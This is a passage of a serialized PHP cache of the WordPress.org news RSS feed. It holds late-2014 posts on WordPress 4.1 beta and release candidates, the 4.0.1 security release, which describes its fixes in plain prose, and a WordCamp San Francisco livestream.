\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 4.1 Release Candidate 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 02:22:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3411\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:429:\"The next release candidate for WordPress 4.1 is now available for testing. Seventy changes have gone in since the first release candidate. With no known issues left, we plan to release 4.1 tomorrow, December 18. To test, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If you’d like to learn more about […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1465:\"<p>The next release candidate for WordPress 4.1 is now available for testing.</p>\n<p><a href=\"https://core.trac.wordpress.org/log/trunk?rev=30961&stop_rev=30827\">Seventy changes</a> have gone in since the <a href=\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/\">first release candidate</a>. With no known issues left, we plan to release 4.1 tomorrow, December 18.</p>\n<p>To test, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.1-RC3.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.1, visit the updated About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar) and also check out <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">the Beta 1 post</a>.</p>\n<p><strong>Plugin authors:</strong> Remember to test your plugins against 4.1, and if they’re compatible, make sure they are marked as tested up to 4.1. Be sure to follow along the core development blog; we’ve been posting <a href=\"https://make.wordpress.org/core/tag/4-1-dev-notes/\">notes for developers for 4.1</a> as always.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate-3/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 4.1 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 11 Dec 2014 11:52:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"4.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3375\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:341:\"The release candidate for WordPress 4.1 is now available. We’ve made a lot of refinements over the last few weeks. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.1 on Tuesday, December 16, but we need your […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2301:\"<p>The release candidate for WordPress 4.1 is now available.</p>\n<p>We’ve made a lot of refinements over the last few weeks. RC means we think we’re done, but with millions of users and thousands of plugins and themes, it’s possible we’ve missed something. We hope to ship WordPress 4.1 on Tuesday, December 16, but we need your help to get there. If you haven’t tested 4.1 yet, now is the time! (Please though, not on your live site unless you’re adventurous.)</p>\n<p><strong>Think you’ve found a bug?</strong> Please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta support forum</a>. If any known issues come up, you’ll be able to <a href=\"https://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>To test WordPress 4.1 RC1, you can use the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin or you can <a href=\"https://wordpress.org/wordpress-4.1-RC1.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.1, visit the About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar) or check out the <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">beta announcement</a>.</p>\n<p><strong>Developers</strong>, please test your plugins and themes against WordPress 4.1 and update your plugin’s <em>Tested up to</em> version in the readme to 4.1 before next week. If you find compatibility problems, we never want to break things, so please be sure to post to the support forums so we can figure those out before the final release.</p>\n<p>Be sure to <a href=\"https://make.wordpress.org/core/\">follow along the core development blog</a>, where we’ll continue to post <a href=\"https://make.wordpress.org/core/tag/4-1-dev-notes/\">notes for developers</a> for 4.1. (For example: if you’ve written a child theme for Twenty Fifteen, some of the new pagination functions have been renamed for clarity.)</p>\n<p><em>Testing four point one</em><br />\n<em>Why are we up at this hour?</em><br />\n<em>Code is poetry</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2014/12/wordpress-4-1-release-candidate/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"WordPress 4.0.1 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Nov 2014 18:55:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3363\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:345:\"WordPress 4.0.1 is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately. Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3395:\"<p>WordPress 4.0.1 is now available. This is a <strong>critical security release</strong> for all previous versions and we strongly encourage you to update your sites immediately.</p>\n<p>Sites that support automatic background updates will be updated to WordPress 4.0.1 within the next few hours. If you are still on WordPress 3.9.2, 3.8.4, or 3.7.4, you will be updated to 3.9.3, 3.8.5, or 3.7.5 to keep everything secure. (We don’t support older versions, so please update to 4.0.1 for the latest and greatest.)</p>\n<p>WordPress versions 3.9.2 and earlier are affected by a critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site. This was reported by <a href=\"http://klikki.fi/\">Jouko Pynnonen</a>. This issue does not affect version 4.0, but version 4.0.1 does address these eight security issues:</p>\n<ul>\n<li>Three cross-site scripting issues that a contributor or author could use to compromise a site. Discovered by <a href=\"http://joncave.co.uk/\">Jon Cave</a>, <a href=\"http://www.miqrogroove.com/\">Robert Chapin</a>, and <a href=\"https://johnblackbourn.com/\">John Blackbourn</a> of the WordPress security team.</li>\n<li>A cross-site request forgery that could be used to trick a user into changing their password.</li>\n<li>An issue that could lead to a denial of service when passwords are checked. Reported by <a href=\"http://www.behindthefirewalls.com/\">Javier Nieto Arevalo</a> and <a href=\"http://www.devconsole.info/\">Andres Rojas Guerrero</a>.</li>\n<li>Additional protections for server-side request forgery attacks when WordPress makes HTTP requests. Reported by Ben Bidner (vortfu).</li>\n<li>An extremely unlikely hash collision could allow a user’s account to be compromised, that also required that they haven’t logged in since 2008 (I wish I were kidding). Reported by <a href=\"http://david.dw-perspective.org.uk\">David Anderson</a>.</li>\n<li>WordPress now invalidates the links in a password reset email if the user remembers their password, logs in, and changes their email address. Reported separately by <a href=\"https://twitter.com/MomenBassel\">Momen Bassel</a>, <a href=\"http://c0dehouse.blogspot.in/\">Tanoy Bose</a>, and <a href=\"https://managewp.com/\">Bojan Slavković of ManageWP</a>.</li>\n</ul>\n<p>Version 4.0.1 also fixes 23 bugs with 4.0, and we’ve made two hardening changes, including better validation of EXIF data we are extracting from uploaded photos. Reported by <a href=\"http://www.securesolutions.no/\">Chris Andrè Dale</a>.</p>\n<p>We appreciated the <a href=\"https://codex.wordpress.org/FAQ_Security\">responsible disclosure</a> of these issues directly to our security team. For more information, see the <a href=\"https://codex.wordpress.org/Version_4.0.1\">release notes</a> or consult the <a href=\"https://core.trac.wordpress.org/log/branches/4.0?rev=30475&stop_rev=29710\">list of changes</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.0.1</a> or venture over to <strong>Dashboard → Updates</strong> and simply click “Update Now”.</p>\n<p><em>Already testing WordPress 4.1? The second beta is now available (<a href=\"https://wordpress.org/wordpress-4.1-beta2.zip\">zip</a>) and it contains these security fixes. For more on 4.1, see <a href=\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\">the beta 1 announcement post</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/11/wordpress-4-0-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.1 Beta 1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Nov 2014 22:35:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:4:\"beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3352\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:346:\"Welcome, everyone, to WordPress 4.1 Beta 1! This software is still in development, so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.1, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"John Blackbourn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3409:\"<p>Welcome, everyone, to WordPress 4.1 Beta 1!</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.1, try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"//wordpress.org/wordpress-4.1-beta1.zip\">download the beta here</a> (zip).</p>\n<p>WordPress 4.1 is due for release next month, so we need your help with testing. Here are some highlights of what to test:</p>\n<ul>\n<li>Our beautiful new default theme, <a href=\"https://make.wordpress.org/core/2014/09/09/twenty-fifteen/\">Twenty Fifteen</a>. It’s a clean, mobile-first, blog-focused theme designed through simplicity.</li>\n<li>A new <a href=\"https://make.wordpress.org/core/2014/11/11/focus-v2-demo-video/\">distraction-free writing mode for the editor</a>. It’s enabled by default for beta, and we’d love feedback on it.</li>\n<li>The ability to automatically install new language packs right from the General Settings screen (available as long as your site’s filesystem is writable).</li>\n<li>A new inline formatting toolbar for images embedded into posts.</li>\n</ul>\n<p>There have been a lot of changes for developers to test as well:</p>\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2014/10/20/update-on-query-improvements-in-4-1/\">Improvements to meta, date, comment, and taxonomy queries</a>, including complex (nested, multiple relation) queries; and querying comment types (<a href=\"https://core.trac.wordpress.org/ticket/12668\">#12668</a>).</li>\n<li>A single term shared across multiple taxonomies is now split into two when updated. For more, <a href=\"https://make.wordpress.org/core/2014/11/12/an-update-on-the-taxonomy-roadmap/\">see this post</a>, <a href=\"https://core.trac.wordpress.org/ticket/5809\">#5809</a>, and <a href=\"https://core.trac.wordpress.org/ticket/30335\">#30335</a>.</li>\n<li>A new and better way for <a href=\"https://make.wordpress.org/core/2014/10/29/title-tags-in-4-1/\">themes to handle title tags</a>.</li>\n<li>Several <a href=\"https://make.wordpress.org/core/2014/10/27/toward-a-complete-javascript-api-for-the-customizer/\">improvements to the Customizer API</a>, including contextual panels and sections, and JavaScript templates for controls.</li>\n</ul>\n<p>If you want a more in-depth view of what changes have made it into 4.1, <a href=\"https://make.wordpress.org/core/tag/week-in-core/\">check out the weekly review posts</a> on the main development blog.</p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. We’d love to hear from you! If you’re comfortable writing a reproducible bug report, <a href=\"https://make.wordpress.org/core/reports/\">file one on the WordPress Trac</a>. There, you can also find <a href=\"https://core.trac.wordpress.org/tickets/major\">a list of known bugs</a> and <a href=\"https://core.trac.wordpress.org/query?status=closed&group=component&milestone=4.1\">everything we’ve fixed</a> so far.</p>\n<p>Happy testing!</p>\n<p><em>Twenty Fifteen theme</em><br />\n<em> The beautiful face which hides</em><br />\n<em> Many improvements</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2014/11/wordpress-4-1-beta-1/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"Watch WordCamp San Francisco Livestream\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/10/wcsf-livestream/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/10/wcsf-livestream/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 24 Oct 2014 20:18:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3341\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:381:\"WordCamp San Francisco is the official annual WordPress conference, gathering the community every year since 2006. This is the time when Matt Mullenweg addresses the community in his annual State of the Word presentation – a recap of the year in WordPress and giving us a glimpse into its future. This year the speaker lineup is stellar. There will be talks by […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Nikolay Bachiyski\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1975:\"<p><a title=\"2014 edition\" href=\"http://2014.sf.wordcamp.org\">WordCamp San Francisco</a> is the official annual WordPress conference, gathering the community every year <a title=\"An old website for a WordPress long time ago\" href=\"http://2006.sf.wordcamp.org\">since 2006</a>. This is the time when Matt Mullenweg addresses the community in his annual <a href=\"http://wordpress.tv/?s=state+of+the+word\">State of the Word</a> presentation – a recap of the year in WordPress and giving us a glimpse into its future.</p>\n<p>This year the speaker lineup is stellar. There will be talks by three of the lead WordPress developers: <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-andrew-nacin\">Andrew Nacin</a>, <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-helen-hou-sandi\">Helen Hou-Sandí</a>, and <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-mark-jaquith\">Mark Jaquith</a>. We’re also looking forward to speakers like <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-jenny-lawson\">Jenny Lawson</a>, also known as The Bloggess, and <a href=\"http://2014.sf.wordcamp.org/speaker/chris-lema/\">Chris Lema</a>. If you’re at all interested in the web, you will appreciate the appearance of <a href=\"http://2014.sf.wordcamp.org/speakers/#wcorg-speaker-jeff-veen\">Jeff Veen</a> – one of the creators of Google Analytics and co-founder of Typekit.</p>\n<p>Even though San Francisco is far far away for most of you, you can still be part of the fun and watch all presentations in real-time via livestream:</p>\n<p><a href=\"http://2014.sf.wordcamp.org/tickets/\">Get a livestream ticket and watch all talks from WordCamp San 